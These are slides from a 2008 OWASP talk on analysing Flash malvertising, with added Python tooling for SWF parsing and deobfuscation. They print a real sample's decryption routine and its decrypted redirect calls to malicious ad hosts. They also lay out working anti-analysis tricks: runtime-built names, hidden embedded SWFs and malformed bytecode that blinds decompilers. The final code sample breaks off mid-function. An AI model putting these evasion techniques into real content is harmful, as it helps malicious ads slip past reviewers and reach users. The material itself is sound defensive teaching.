Slide 1: The Detection and Analysis of Flash Based Malware
OWASP Asia Pacific Conference 2008. Paul Theriault, Senior Associate, SIFT (paul.theriault@sift.com.au). Feb 2008.
Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation, http://www.owasp.org
Slide 2: About me
Paul Theriault, security consultant with SIFT (www.sift.com.au)
- Web application penetration tester
- Code review and developer training
- Security researcher
Slide 3: Background
- Flash is a commonly used format for rich media on the internet.
- Flash "movies" aren't really movies: they are application bytecode executed by the Flash Player runtime.
- Many websites accept third-party Flash content:
  - Advertising networks
  - Gaming websites (Kongregate, Newgrounds, ...)
  - Graphic design/art sites (Flash Kit, DeviantArt, ...)
  - Others: any forum that allows SWF avatars, etc.
- Third-party Flash movies may contain malicious code. How can you tell?
Slide 4: Talk Outline
1. Flash based malware: background; introduction to the malware case study
2. Analysis methods: disassembly, decompiling, runtime analysis
3. Counter-analysis methods: obfuscation and stack manipulation; dynamically loading content
Slide 5: Flash Advertising
- Flash has become a common format for web advertisements.
- The advertising organisation must accept third-party content, which may be malicious.
- The attacker only needs to redirect the user to a malicious site, and ads are supposed to redirect users!
- Ads are also often allowed to contact third-party servers for tracking purposes.
Slide 6: Rise in "Malvertising"
- Malvertising: spreading malware by convincing sites to host malicious advertisements (http://isc.sans.org/diary.html?storyid=3727).
- Major advertising organisations have been affected.
- The typical method is to force the victim to a malicious website.
- Old problem, new(ish) vector: http://msmvps.com/spywaresucks, www.mikeonads.com
Slide 7: "SkyAuction/BlessedAds/Errorsafe" Malware
- Seen since March 2007 across many organisations.
- Gained widespread media attention in November 2007, with major internet properties affected.
- A fictitious Flash advertisement that redirects the visitor to a malicious website without user interaction.
- Note: the Flash file does not exploit any vulnerability; the redirect is done with ordinary ActionScript functionality.
- Used encryption and obfuscated programming techniques to hide function calls and URLs.
Slide 8: Analysis Methods
Slide 9: Analysis of Flash Content
- Flash overview
- Static analysis
  - Bytecode-level analysis
  - ActionScript analysis (focus on the ActionScript portions of the SWF file)
- Runtime analysis
Slide 10: SWF Introduction
Slide 11: SWF Format
- A SWF contains images, sounds, video clips AND ActionScript bytecode, stored in a series of tagged data blocks. (ABC is the AS3 bytecode format; AS1/AS2 code is stored as AVM1 action records.)
- Layout: Header, then a sequence of tags, e.g. FileAttributes ... End.
- Two types of tags, definition and control:
  - Definition tags define content (shapes, text, sounds, script, etc.) and assign it a character ID.
  - Control tags manipulate instances of that content (instances of characters) and control the flow of the file.
- The complete SWF specification is available from http://www.adobe.com/licensing/developer/ (requires registration).
Slide 12: ActionScript Overview
- Focus on the tags that contain ActionScript:
  - AS3: DoABC
  - AS2: DoAction, DoInitAction, DefineButton2 (the older DefineButton tag and PlaceObject2/PlaceObject3 clip actions can carry AS2 action records too)
- ActionScript bytecode is a sequence of actions operating on the virtual machine's state (stack and registers).
- Specification for AVM2 bytecode: http://www.adobe.com/devnet/actionscript/articles/avm2overview.pdf
Slide 13: ActionScript Overview (continued)
Slide 14: Tools for Static Analysis
- Hex editor
- Flasm: ActionScript bytecode assembler/disassembler
- swfmill: converts SWF to XML and vice versa
- ActionScript decompilers:
  - Flare (AS2)
  - avmplus (AS3), compiled from Tamarin: https://www.flashsec.org/wiki/Simple_AS3_Decompiler_Using_Tamarin
Slide 15: SWF Deconstructed
The same two-line ActionScript (var url = 'http://www.sift.com.au'; getURL(url, '_self');) shown side by side as source, as Flasm disassembly, as swfmill XML and as raw SWF bytes. Each view is expanded on the following four slides.
Slide 16: SWF Deconstructed: ActionScript
var url = 'http://www.sift.com.au';
getURL(url, '_self');
Slide 17: SWF Deconstructed: Flasm
The stack contents after each action, as annotated on the slide, are shown in braces (top of stack first):
frame 0
  constants 'url', 'http://www.sift.com.au', '_self'
  push c:0, c:1        // {"http://www.sift.com.au", "url"}
  varEquals            // {}
  push c:0             // {"url"}
  getVariable          // {"http://www.sift.com.au"}
  push c:2             // {"_self", "http://www.sift.com.au"}
  getURL2              // {}
end // of frame 0
Slide 18: SWF Deconstructed: swfmill XML
Slide 19: SWF Deconstructed: SWF bytes
Decoded against the SWF and AVM1 action specifications (the constant pool string in this dump reads 'http:www.sift.com.au', without the slashes):
46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00   ; "FWS", version 8, file length 0x66 = 102, RECT, frame rate, frame count
44 11 00 00 00 00                                                 ; FileAttributes tag (code 69, length 4)
43 02 FF FF FF                                                    ; SetBackgroundColor tag (code 9, length 3)
3F 03 3C 00 00 00                                                 ; DoAction tag (code 12, long length 0x3C = 60)
88 21 00 03 00 75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00   ; ActionConstantPool, 3 strings: 'url', 'http:www.sift.com.au', '_self'
96 04 00 08 00 08 01                                              ; push c:0, c:1
3C                                                                ; varEquals
96 02 00 08 00                                                    ; push c:0
1C                                                                ; getVariable
96 02 00 08 02                                                    ; push c:2
9A 01 00 00                                                       ; getURL2
00                                                                ; end of actions
40 00                                                             ; ShowFrame
00 00                                                             ; End
Slide 21: Bytecode Analysis
- SWFs are usually compressed. Look at the first 3 bytes: CWS = compressed (zlib), FWS = uncompressed.
- Use 'flasm -x movie.swf' to decompress.
- Open the SWF in a hex editor: some unusual strings show up, but the format is difficult to read this way.
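Added example (not from the talk): a small Python parser for the container layout described on slides 11, 12 and 21. It reads the FWS/CWS signature, inflates a CWS body (what 'flasm -x' does), walks the tag list through both short and long record headers, and runs a hex-editor style strings pass over the tags that can carry ActionScript. The sample file is the 102-byte SWF dumped on slide 19, which is a complete and valid file; its constant pool reads 'http:www.sift.com.au' exactly as dumped. ZWS (LZMA, added in SWF version 13, after this talk) is recognised but not unpacked.

```python
"""Parse the SWF container: signature, compression, tag list, script-bearing tags."""
import struct
import zlib

# Constructed sample: the 102-byte SWF whose hex dump appears on slide 19 of the talk.
SAMPLE_SWF = bytes.fromhex(
    "46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00"   # FWS, v8, len 102, RECT, rate, count
    " 44 11 00 00 00 00"                                                # FileAttributes
    " 43 02 FF FF FF"                                                   # SetBackgroundColor
    " 3F 03 3C 00 00 00 88 21 00 03 00 75 72 6C 00"                     # DoAction (60 bytes), ConstantPool
    " 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00"
    " 96 04 00 08 00 08 01 3C 96 02 00 08 00 1C 96 02 00 08 02 9A 01 00 00 00"
    " 40 00 00 00"                                                      # ShowFrame, End
)

TAG_NAMES = {0: "End", 1: "ShowFrame", 9: "SetBackgroundColor", 12: "DoAction",
             34: "DefineButton2", 59: "DoInitAction", 69: "FileAttributes", 82: "DoABC"}
SCRIPT_TAGS = {12, 34, 59, 82}   # the tags slide 12 says to focus on


def unwrap_swf(data):
    """Return (signature, version, uncompressed body) or raise if this is not a SWF we can open."""
    sig, version = data[:3], data[3]
    declared = struct.unpack_from("<I", data, 4)[0]   # length of the *uncompressed* file
    if sig == b"FWS":
        body = data[8:]
    elif sig == b"CWS":
        body = zlib.decompress(data[8:])
    elif sig == b"ZWS":
        raise ValueError("LZMA-compressed SWF (version 13+); not handled by this example")
    else:
        raise ValueError("not a SWF file")
    if len(body) + 8 != declared:
        raise ValueError(f"length field says {declared} bytes, got {len(body) + 8}")
    return sig.decode(), version, body


def iter_tags(body):
    """Yield (tag code, payload); skips the RECT, frame rate and frame count that precede the tags."""
    nbits = body[0] >> 3                      # RECT: 5-bit field count, then 4 fields of nbits
    pos = (5 + 4 * nbits + 7) // 8 + 4
    while pos + 2 <= len(body):
        header = struct.unpack_from("<H", body, pos)[0]
        pos += 2
        code, length = header >> 6, header & 0x3F
        if length == 0x3F:                    # long form RECORDHEADER
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        yield code, body[pos:pos + length]
        pos += length
        if code == 0:
            break


def printable_runs(payload, minimum=4):
    """What you would eyeball in a hex editor: runs of printable ASCII."""
    runs, current = [], bytearray()
    for b in payload + b"\x00":
        if 0x20 <= b < 0x7F:
            current.append(b)
        else:
            if len(current) >= minimum:
                runs.append(current.decode("ascii"))
            current = bytearray()
    return runs


def summarize(data):
    sig, version, body = unwrap_swf(data)
    report = {"signature": sig, "version": version, "tags": [], "script_payloads": [], "strings": []}
    for code, payload in iter_tags(body):
        report["tags"].append(TAG_NAMES.get(code, f"Tag{code}"))
        if code in SCRIPT_TAGS:
            report["script_payloads"].append(payload)
            report["strings"].extend(printable_runs(payload))
    return report


def compress_swf(data):
    """Build the CWS form of an FWS file (the form 'flasm -x' undoes), to exercise both paths."""
    return b"CWS" + data[3:8] + zlib.compress(data[8:])


if __name__ == "__main__":
    for sample in (SAMPLE_SWF, compress_swf(SAMPLE_SWF)):
        r = summarize(sample)
        print(r["signature"], f"v{r['version']}", r["tags"], r["strings"])
```

The length check matters in practice: the header's length field describes the uncompressed file, so a CWS whose inflated body does not match it has been truncated or tampered with, and a parser that trusts the field without checking will walk off the end of the tag list.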
Slide 22: swfmill
- Available from http://swfmill.org
- Converts SWF into XML (and XML to SWF).
- Much easier to read than hex, but the files are very large: a 50 KB malware sample became a 6000-line XML document, since the graphic data is included.
- Less information than decompiling, but more resilient to obfuscation.
Slide 23: swfmill
The constant pool from the malware. It is difficult to determine where each constant is used in this view.
Slide 24: Flasm
- Flasm is an assembler/disassembler for AS1/AS2 (AVM1) bytecode; it does not handle AS3 ABC.
- Available from http://www.nowrap.de/flasm.html
- Describes the ActionScript present in the SWF file in terms of virtual machine actions: push, pop, add, callMethod, jump, etc.
- Flasm provides lower-level analysis and helps with understanding exactly what is going on inside the AVM.
Slide 25: Flasm Analysis
Looking at the constant pool in the malware (long strings re-joined where the slide wrapped them):
constants '_root', 'c1', '47ED02', 'c2', '46E91A247C', 'c3', '7FF817257C8DF8', 'c4', '50E70523', 'c5', '7FD7153B7080E795EA776F', 'c6', '48FC022723CCA3A8F36070509F2105CBA738D20F50A22FD09E2BB74956972D2F50252B6269', 'c7', '11', 'c8', '10', 'c9', 'c10', 'c11', 'c12', '17', 'c13', '48FC022723CCA3', 'c14', 'c15', '0DB1', 'c16', 'c17', '48FC022723CCA3A7E67676518C201D9BA138D20F50A263C7922FAD031B923C634721342266E62EB8CBB7746D368E0268C2', 'c18', '14B8', 'c19', '4DE905237C91BCA4F66B774FC274559DE42686', 'c20', '0F', 'c21', '18BE426729D3BCFA', 'c22', '7FD7022D', 'c23', '7FFD043B', 'c24', '53FD14246D91', 'c25', '7FD7102363', 'c26', '7FD7103B6F', 'c27', '7FD710347188', 'c28', '53ED1833', 'c29', '47ED0203708EE9B0F06B666C9C2317CAA0', 'String', 'prototype', 'color', 'eslogan', 'result', '', 'n', 'this', 'length', 'slice', 'parseInt', 'fromCharCode', '_visible', 'getNextHighestDepth', 'emc', 'createEmptyMovieClip', 'u', 'dt', 'getTime', 'loadVariables', 'i', 'setInterval', 'stats', 'clearInterval', 'LoadVars', 'so', 'SharedObject', 'getLocal', 'data', 'uzhe', 'exp', 'Date', 'cr', 'expires', 'flush', 'lim', 'r', 'view'
Looks a bit fishy: hex-looking blobs stored next to parseInt, fromCharCode, loadVariables, LoadVars and SharedObject. (The pool stores each distinct string once, which is why c9, c10, c11, c14 and c16 have no value of their own beside them.)
Slide 26: Flasm Analysis
We can also see where it is called:
push 3, 0.0, 'LoadVars'
new
push 14688422, 1, r:1, 'c28'
getMember
push 'color'
callMethod
The method invoked on the new LoadVars object is never named in the file: it is whatever calling 'color' on r:1.c28 with the argument 14688422 returns. So 'color' is called on the encrypted constants before LoadVars is used.
Slide 27: ActionScript Analysis
- Flare (http://www.nowrap.de/flare.html) decompiles SWF files (AS2 only) to ActionScript.
- Manually trace the ActionScript for malicious behaviour: functions which connect remotely, and other strange behaviours.
- Provides a much better view of what is going on.
Slide 28: ActionScript Analysis
Examine where the strange strings are assigned:
_root.c1 = '47ED02';
_root.c2 = '46E91A247C';
_root.c3 = '7FF817257C8DF8';
_root.c4 = '50E70523';
_root.c5 = '7FD7153B7080E795EA776F';
_root.c6 = '48FC022723CCA3A8F36070509F2105CBA738D20F5…
Now search for where they are used:
(new LoadVars())[v1.c28.color(14688422)](v1.c6.color(14688422), v1.c3.color(14688422), v1.c4.color(14688422));
So we know it is opening a location, but where?
Slide 29: ActionScript Analysis
The String.prototype.color() function is actually a decryption method; its eslogan argument (14688422 at every call site) is the decryption key:
String.prototype.color = function (eslogan) {
    var v3 = eslogan;
    var result = '';
    var v1;
    var n;
    var v2;
    v1 = 0;
    n = this.length;
    while (v1 < n) {
        v2 = parseInt(this.slice(v1, v1 + 2), 16) ^ v3 >> 8 & 255;
        if (v2 > 127) {
            v2 += 848;
        }
        result += String.fromCharCode(v2);
        v3 = (v3 * 52845 + 22719) % 16777215;
        v1 += 2;
    }
    return result;
};
Slide 30: ActionScript Analysis
Compile and run the decryption algorithm across the mystery variables:
c1: get
c2: false
c3: _parent
c4: post
c5: __click_url
c6: http://blessedads.com/?cmpid=master0n
c7: 1
c8: 0
c9: 0
c10: 1
c11: 0
c12: 7
c13: http://
c14: 0
c15: -9
c16: 0
c17: http://mysurvey4u.com/stats.php?campaign=master0n
c18: 40
c19: master0nintl8112007
c20: /
c22: __tz
c23: _url
c24: substr
c25: __ftz
c26: __flv
c27: __fchk
c28: send
c29: getTimezoneOffset
Slide 31: ActionScript Analysis
Substituting the decrypted strings back into the original file reveals the calls:
v1.emc.loadVariables("http://mysurvey4u.com/stats.php?campaign=master0n", "get");
(new LoadVars())["send"]("http://blessedads.com/?cmpid=master0n", "_parent", "post");
Slide 32: Interesting Classes and Functions (AS2)
- Global functions: asfunction, ASnative, chr, escape, eval, fscommand, getTimer, getURL, loadMovie, loadMovieNum, loadVariables, mbchr, mbord, mbsubstring, MMExecute, setInterval, setTimeout, unescape
- Global properties: _global, _level, _root
- Classes: System.capabilities, ExternalInterface, LoadVars, LocalConnection, MovieClipLoader, NetConnection, NetStream, System.security, XML, XMLSocket
- Functions: XML.load, StyleSheet.load, LoadVars.load, LoadVars.send, LocalConnection.send, PrintJob.send, XML.send, XMLSocket.send, XML.sendAndLoad, LoadVars.sendAndLoad, FileReference.upload, FileReference.download
Slide 33: Interesting Classes and Functions (AS3)
- Classes: flash.display.Loader, flash.external.ExternalInterface, flash.media.Sound, flash.media.Video, flash.net.LocalConnection, flash.net.NetConnection, flash.net.NetStream, flash.net.SharedObject, flash.net.Socket, flash.net.URLLoader, flash.net.URLRequest, flash.net.URLStream, flash.net.XMLSocket, flash.system.Security, flash.system.LoaderContext, flash.utils.ByteArray, flash.utils.Timer
- Functions: flash.net.navigateToURL, flash.net.sendToURL, flash.net.registerClassAlias, flash.system.fscommand, flash.utils.setInterval, flash.utils.setTimeout, flash.utils.getDefinitionByName, flash.utils.getQualifiedClassName, flash.utils.getQualifiedSuperclassName, flash.utils.getTimer, flash.utils.unescapeMultiByte
Slide 34: Runtime Analysis
- Load the file and use a proxy to observe (and limit!) its network interactions. Obviously better to do this on an isolated test machine.
- This malware tries to evade dynamic analysis: it only connects to the malicious website when the movie was loaded via http AND the viewer's time zone offset falls in a particular range. With the decrypted strings substituted in, the check is:
_root["__tz"] = -(new Date())["getTimezoneOffset"]() / 60;
if ((_root["_url"]["substr"](parseInt(0), parseInt(7)) == "http://") && !(_root["__tz"] >= -9 && _root["__tz"] <= 0)) {
- __tz is the viewer's offset from UTC in hours, positive east of UTC. The redirect therefore fires only for viewers outside UTC-9 to UTC+0 (that range covers the North and South American time zones), and never when the SWF is opened from disk (file://) or over https, which is exactly how an analyst or ad reviewer tends to run it.
Slide 35: Advanced Runtime Analysis via Debugger
- Many debug tools are available for Flash:
  - fdb (http://labs.adobe.com/technologies/flex/sdk/)
  - ofd-net (alpha: http://sourceforge.net/projects/ofd-net)
- Requires the debug Flash Player: http://www.adobe.com/support/flashplayer/downloads.html
- For a third-party SWF, where do you get the debug file (SWD)? "swf2swd.exe" from Nikos Kastellanos (ofd-net author, URL above).
- You also need to enable debugging: UnlockSWF (http://www.buraks.com/unlockswf/).
- However, swf2swd has problems with malformed Flash files; work is required to develop a robust SWD extractor.
Slide 36: Runtime Analysis
- Issues with runtime analysis:
  - Difficult to automate
  - Have to execute potentially dangerous code
  - Relies on observing external interactions (until debugging tools are more mature)
- Other runtime analysis tools:
  - SWFIntruder: https://www.owasp.org/index.php/Category:SWFIntruder
  - Erlswf: http://pentaphase.de/index.php?/archives/29-Erlang-unscrables-SWF.html
Slide 37: Counter-Analysis Methods
Slide 38: Counter-Analysis
- Creating class and function names at runtime
- Embedding code and loading it at runtime
- Code obfuscation
Slide 39: Class Names at Runtime
Basic static analysis relies on locating key function and class names. Classes can be instantiated from strings:
AS2: var myClass = _global['LoadVars'];
AS3: var ClassReference:Class = getDefinitionByName("flash.display.Loader") as Class;
For example:
var f = String.fromCharCode;
var a = f(76); a += f(111); a += f(97); a += f(100); a += f(86); a += f(97); a += f(114); a += f(115);
(new _global[a]()).send('http://www.sift.com.au', '_parent', 'post');
The string 'LoadVars' no longer appears in the file.
Slide 40: Function Names at Runtime
Works for function names too:
var v3 = chr(103) + (chr(101) + (chr(116) + (chr(85) + (chr(82) + chr(76)))));
_root[v3]('http://www.sift.com.au', '_parent', 'post');
The string 'getURL' no longer appears in the file.
Slide 41: ASnative
- ASnative is an undocumented function: it calls AS2 built-ins by reference numbers, as if all functions existed in a spreadsheet, and can be used instead of the real function names.
- var escapeFunction = _global["ASnative"](100, 0);
- Examples:
  - ASnative(253, 7): [_global] XML
  - ASnative(301, 0): [XML.prototype] load
  - ASnative(100, 0): [_global] escape
- http://osflash.org/flashcoders/undocumented/asnative
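Added example (not from the talk): the static counter to slides 39 to 41. Decompiled AS2 that builds names from chr()/String.fromCharCode() calls still contains the character codes, so a constant-folding pass recovers the names and can substitute them back into the call sites, the way slide 31 substituted the decrypted strings. The input is a constructed snippet assembled from the three slides' own code; the ASnative table holds only the three (major, minor) pairs slide 41 lists. Splitting statements on ';' is enough for this input but a real Flare dump needs a tokenizer that respects string literals.

```python
"""Fold runtime-built names in decompiled AS2 back into literals."""
import re

# Constructed input: the snippets from slides 39, 40 and 41, one after another.
SAMPLE = """
var f=String.fromCharCode;
var a=f(76); a+=f(111); a+=f(97); a+=f(100); a+=f(86); a+=f(97); a+=f(114); a+=f(115);
(new _global[a]()).send('http://www.sift.com.au', '_parent', 'post');
var v3 = chr(103) + (chr(101) + (chr(116) + (chr(85) + (chr(82) + chr(76)))));
_root[v3]('http://www.sift.com.au', '_parent', 'post');
var escapeFunction=_global["ASnative"](100, 0);
"""

# ASnative(major, minor) pairs as listed on slide 41; extend from the osflash table as needed.
ASNATIVE_KNOWN = {(253, 7): "XML", (301, 0): "XML.prototype.load", (100, 0): "escape"}


def charcode_aliases(src):
    """chr, String.fromCharCode, plus any 'var x = String.fromCharCode' alias the script defines."""
    names = {"chr", "String.fromCharCode"}
    names.update(re.findall(r"var\s+(\w+)\s*=\s*String\.fromCharCode\b", src))
    return names


def fold_charcodes(src):
    """Recover variables built from character-code calls, including 'a += f(n)' accumulation."""
    aliases = sorted(charcode_aliases(src), key=len, reverse=True)
    alias_re = "|".join(re.escape(a) for a in aliases)
    call_re = re.compile(rf"\b(?:{alias_re})\s*\(\s*(\d+)\s*\)")
    recovered = {}
    for stmt in src.split(";"):
        m = re.match(r"\s*(?:var\s+)?(\w+)\s*(\+=|=(?!=))\s*(.*)", stmt, re.S)
        if not m:
            continue
        name, op, rhs = m.groups()
        codes = call_re.findall(rhs)
        if not codes:
            continue
        piece = "".join(chr(int(c)) for c in codes)
        recovered[name] = (recovered.get(name, "") + piece) if op == "+=" else piece
    return recovered


def resolve_asnative(src):
    """Translate ASnative(major, minor) references into the built-ins they stand for."""
    hits = []
    for major, minor in re.findall(r"ASnative[\"']?\]?\s*\(\s*(\d+)\s*,\s*(\d+)\s*\)", src):
        hits.append(ASNATIVE_KNOWN.get((int(major), int(minor)), f"ASnative({major}, {minor})"))
    return hits


def deobfuscate(src):
    """Substitute recovered names back so obj[var] call sites read as obj.name."""
    names = fold_charcodes(src)
    out = src
    for var, value in names.items():
        out = re.sub(rf"\[\s*{re.escape(var)}\s*\]", f".{value}", out)
    return out, names


if __name__ == "__main__":
    text, names = deobfuscate(SAMPLE)
    print(names, resolve_asnative(SAMPLE))
    print(text)
```

After folding, the watchlist from slide 32 applies again: 'LoadVars' and 'getURL' are back in the text for a plain string match, which is the reason obfuscators of this kind are cheap to defeat once you do even a little constant folding.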
Slide 42: Embedding Code
- Another method of hiding code is to load the malicious code at runtime.
- However, loading code from an external site is obvious to runtime analysis.
- The alternative is to embed the data within the file and load it at runtime.
- One way to achieve this is the flash.display.Loader.loadBytes() method.
Slide 43: Embedding Code
import flash.display.Loader;
import flash.utils.ByteArray;

var loader:Loader = new Loader();
configureListeners(loader.contentLoaderInfo);
// create a ByteArray containing our malicious SWF
var ba:ByteArray = new ByteArray();
// 67,87,83 is "CWS": a zlib-compressed SWF, version 7, declared length 0x3C3 = 963 bytes
var badware:Array = [67,87,83,7,195,3,0,0,120,218,124,83,203,110,19,49,20,189,227,73,51,78,67,83,154,20,166,145,42,145,93,137,64,176,200,10,197,111,0,71,6,180,201,26,91,33,15,216,6, … 181,186,125,16,51,47,221,254,62,234,103,81,111,71,62,24,123,243,150,44,173,76,137,178,196,28,218,112,138,211,159,0,0,0,255,255,3,0,4,45,181,29];
for (var i:int = 0; i < badware.length; i++) {
    ba.writeByte(badware[i]);
}
// load the SWF
loader.loadBytes(ba);
Slide 44: Embedding Code
- The only remaining evidence is the use of the Loader class and a massive array being pushed on the stack.
- Hiding the use of the Loader class: use dynamic class creation as discussed previously.
- Hiding the data: encrypt/encode the values, or embed them in an image (could also use steganography techniques).
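Added example (not from the talk): a carver for the "massive array" tell on slides 43 and 44. It pulls numeric array literals out of decompiled source, checks whether the bytes start with an SWF signature, and reports whether enough of the file is present to unpack. The constructed input reproduces only the opening bytes the slide actually shows (its array is elided with "…"), so the carver must report a truncated sample rather than crash. As slide 44 says, this catches plain arrays only; encoded or image-embedded payloads need the decoding routine applied first.

```python
"""Carve SWF files embedded as byte arrays in decompiled ActionScript."""
import re
import struct
import zlib

# Constructed input: the start of the loadBytes snippet on slide 43, with the elided bytes left out.
DECOMPILED = """
var ba:ByteArray=new ByteArray();
var badware:Array=[67,87,83,7,195,3,0,0,120,218,124,83,203,110,19,49,20,189,227,73,51,78,67,83,154,20,166,145,42,145,93,137,64,176,200,10,197,111,0,71,6,180,201,26,91,33,15,216,6];
for(var i:int=0;i<badware.length;i++) { ba.writeByte(badware[i]); }
loader.loadBytes(ba);
var colours:Array=[255,0,0,128];
"""

SWF_SIGNATURES = {b"FWS": "uncompressed", b"CWS": "zlib", b"ZWS": "lzma"}


def byte_arrays(src, minimum=8):
    """Yield numeric array literals whose elements all fit in a byte (the 'massive array' tell)."""
    for m in re.finditer(r"\[\s*((?:\d+\s*,\s*)*\d+)\s*\]", src):
        values = [int(v) for v in m.group(1).split(",")]
        if len(values) >= minimum and all(0 <= v <= 255 for v in values):
            yield bytes(values)


def inspect_blob(blob):
    """Report on a carved blob: SWF header fields and whether it is complete enough to unpack."""
    sig = blob[:3]
    if sig not in SWF_SIGNATURES or len(blob) < 8:
        return None
    declared = struct.unpack_from("<I", blob, 4)[0]   # uncompressed file length, per the header
    result = {"signature": sig.decode(), "compression": SWF_SIGNATURES[sig], "version": blob[3],
              "declared_length": declared, "carved_bytes": len(blob), "body": None}
    if sig == b"CWS":
        result["zlib_header"] = blob[8:9] == b"\x78"   # zlib streams start with 0x78
        try:
            result["body"] = zlib.decompress(blob[8:])
        except zlib.error:
            result["body"] = None                      # truncated or not really zlib
    elif sig == b"FWS":
        result["body"] = blob[8:] if len(blob) == declared else None
    result["complete"] = result["body"] is not None and len(result["body"]) + 8 == declared
    return result


def find_embedded_swfs(src):
    return [r for r in (inspect_blob(b) for b in byte_arrays(src)) if r]


if __name__ == "__main__":
    for hit in find_embedded_swfs(DECOMPILED):
        print({k: v for k, v in hit.items() if k != "body"})
```

When the carved body is complete it is an ordinary SWF and goes back through the same static pipeline (flasm, swfmill, Flare), so an embedded payload only buys the attacker one extra round of analysis, not immunity.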
Slide 45: Obfuscation
- Many techniques are available from efforts to protect Flash movie source code: ActionScript obfuscation and bytecode obfuscation.
- ActionScript obfuscation: use confusing variable names, e.g. numbers and non-displayable characters.
Slide 46: Bytecode Obfuscation
- The Flash AVM executes action records one at a time and follows branches wherever they point, whereas a decompiler (or disassembler) breaks the bytecode into meaningful pieces by reading records in sequence from the start.
- We can exploit this difference to confuse decompilers.
- The malicious script we want to hide:
var foo = "getURL";
_root[foo]('http://www.sift.com.au', '_parent', 'post');
Slide 47: Bytecode Obfuscation
Converted to action records this becomes:
constants 'foo', 'getURL', 'post', '_parent', 'http://www.sift.com.au', '_root'
push 'foo', 'getURL'
varEquals
push 'post', '_parent', 'http://www.sift.com.au', 3, '_root'
getVariable
push 'foo'
getVariable
callMethod
pop
Slide 48: Bytecode Obfuscation
Using a malformed push record, we hide the data from decompilers:
push 'junk'          // manually change the size of this push so that it swallows everything up to "branch label2"
label1:
constants 'foo', 'getURL', 'post', '_parent', 'http://www.sift.com.au', '_root'
push 'foo', 'getURL'
varEquals
push 'post', '_parent', 'http://www.sift.com.au', 3, '_root'
getVariable
push 'foo'
getVariable
callMethod
pop
branch label2
branch label1
label2:
The player still runs the movie: after the oversized push it reaches "branch label1", which jumps back into the real code, and the real code ends with "branch label2" past the back-branch. A disassembler reading records in sequence sees only one push record followed by a branch into its middle.
Slide 49: Bytecode Obfuscation
SWF (unaffected):
46 57 53 08 95 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 6B 00 00 00 96 61 00 17 88 37 00 06 00 66 6F 6F 00 67 65 74 55 52 4C 00 70 6F 73 74 00 5F 70 61 72 65 6E 74 00 68 74 74 70 3A 2F 2F 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 72 6F 6F 74 00 96 04 00 08 00 08 01 3C 96 0D 00 08 02 08 03 08 04 07 03 00 00 00 08 05 1C 96 02 00 08 00 1C 52 17 99 02 00 05 00 99 02 00 9B FF 17 …
(The push at "96 61 00" now declares 97 bytes of data: starting with the invalid type byte 17, it covers the whole constant pool and the real code up to and including the first branch. "99 02 00 9B FF" is the branch back 101 bytes, which lands on the constant pool.)
swfmill XML: error, but successful
Flasm:
frame 0
  push ??? // unknown push type 23: rest of push skipped
label1: // Wild label in the middle of an action, now placed before next action
  branch label1
  pop
end // of frame 0
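Added example (not from the talk): a minimal AVM1 action walker that makes the difference on slides 46 to 49 concrete. A linear sweep, which is what the Flasm output on slide 49 shows, decodes records one after another and reports only a malformed push and a branch into its middle. A recursive traversal follows the branch the way the player does, decodes from the target, and recovers the constant pool with 'getURL' and the URL. The sample is the DoAction payload from the slide 49 hex dump; the dump ends in "…" and its length field says 107 bytes, so the final ActionEnd byte (0x00) is assumed here.

```python
"""Linear sweep vs. recursive traversal over an AVM1 action stream with a malformed push."""
import struct

# Constructed sample: the 107-byte DoAction payload from slide 49 (final 0x00 assumed).
OBFUSCATED = bytes.fromhex(
    "96 61 00 17"                                      # push, len 97, first type byte 0x17 (invalid)
    " 88 37 00 06 00 66 6F 6F 00 67 65 74 55 52 4C 00 70 6F 73 74 00 5F 70 61 72 65 6E 74 00"
    " 68 74 74 70 3A 2F 2F 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 72 6F 6F 74 00"
    " 96 04 00 08 00 08 01 3C"
    " 96 0D 00 08 02 08 03 08 04 07 03 00 00 00 08 05 1C"
    " 96 02 00 08 00 1C 52 17"
    " 99 02 00 05 00"                                   # branch +5 (over the back-branch)
    " 99 02 00 9B FF"                                   # branch -101, back to the constant pool
    " 17 00"
)

ACTION_NAMES = {0x88: "constantPool", 0x96: "push", 0x99: "branch", 0x9D: "branchIfTrue",
                0x3C: "varEquals", 0x1C: "getVariable", 0x52: "callMethod", 0x17: "pop", 0x00: "end"}
PUSH_LENGTHS = {1: 4, 2: 0, 3: 0, 4: 1, 5: 1, 6: 8, 7: 4, 8: 1, 9: 2}   # type 0 is a C string


def decode_action(data, pos):
    """One ACTIONRECORD at pos: codes >= 0x80 carry a 16-bit little-endian payload length."""
    code = data[pos]
    if code < 0x80:
        return code, b"", pos + 1
    length = struct.unpack_from("<H", data, pos + 1)[0]
    return code, data[pos + 3:pos + 3 + length], pos + 3 + length


def push_is_wellformed(payload):
    """Walk the typed values inside a push; a type byte outside 0..9 is what trips the tools."""
    i = 0
    while i < len(payload):
        t, i = payload[i], i + 1
        if t == 0:
            end = payload.find(b"\x00", i)
            if end < 0:
                return False
            i = end + 1
        elif t in PUSH_LENGTHS:
            i += PUSH_LENGTHS[t]
        else:
            return False
    return i == len(payload)


def constant_pool(payload):
    count = struct.unpack_from("<H", payload, 0)[0]
    return [s.decode("latin-1") for s in payload[2:].split(b"\x00")[:count]]


def linear_sweep(data):
    """What Flasm/Flare do: decode records one after another from offset 0."""
    listing, boundaries, pos = [], set(), 0
    while pos < len(data):
        boundaries.add(pos)
        code, payload, nxt = decode_action(data, pos)
        note = ""
        if code == 0x96 and not push_is_wellformed(payload):
            note = "malformed push: rest of push skipped"
        elif code in (0x99, 0x9D):
            note = f"-> {nxt + struct.unpack_from('<h', payload)[0]}"
        listing.append((pos, ACTION_NAMES.get(code, f"action_{code:02x}"), note))
        pos = nxt
        if code == 0:
            break
    return listing, boundaries


def hidden_branch_targets(data):
    """Branches that land inside a record of the linear sweep: the obfuscation's fingerprint."""
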